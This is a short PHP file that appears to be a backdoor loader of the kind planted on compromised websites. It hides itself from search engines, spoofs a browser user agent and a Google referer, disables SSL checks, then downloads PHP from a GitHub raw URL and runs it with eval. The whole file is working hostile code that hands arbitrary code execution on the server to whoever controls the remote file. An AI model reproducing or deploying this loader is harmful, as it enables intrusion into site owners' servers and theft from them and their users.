<?php

header("X-Robots-Tag: noindex, nofollow", true);
function getURL($url) {
    if (function_exists('curl_version')) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
            CURLOPT_HTTPHEADER => [
                'Accept: */*',
                'Referer: https://google.com'
            ],
            CURLOPT_ENCODING => '',
            CURLOPT_TIMEOUT => 15
        ]);
        $data = curl_exec($ch);

        // Debug error kalau 0 byte
        if (curl_errno($ch)) {
            error_log('CURL Error: ' . curl_error($ch));
        }

        curl_close($ch);
        return $data;
    }

    $opts = [
        "http" => [
            "method" => "GET",
            "header" =>
                "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n" .
                "Referer: https://google.com\r\n"
        ],
        "ssl" => [
            "verify_peer" => false,
            "verify_peer_name" => false,
        ]
    ];
    $context = stream_context_create($opts);
    return file_get_contents($url, false, $context);
}

eval("?>" . getURL("https://raw.githubusercontent.com/InvisibleBunny/Records/main/Bunny-Mini/minify.php"));
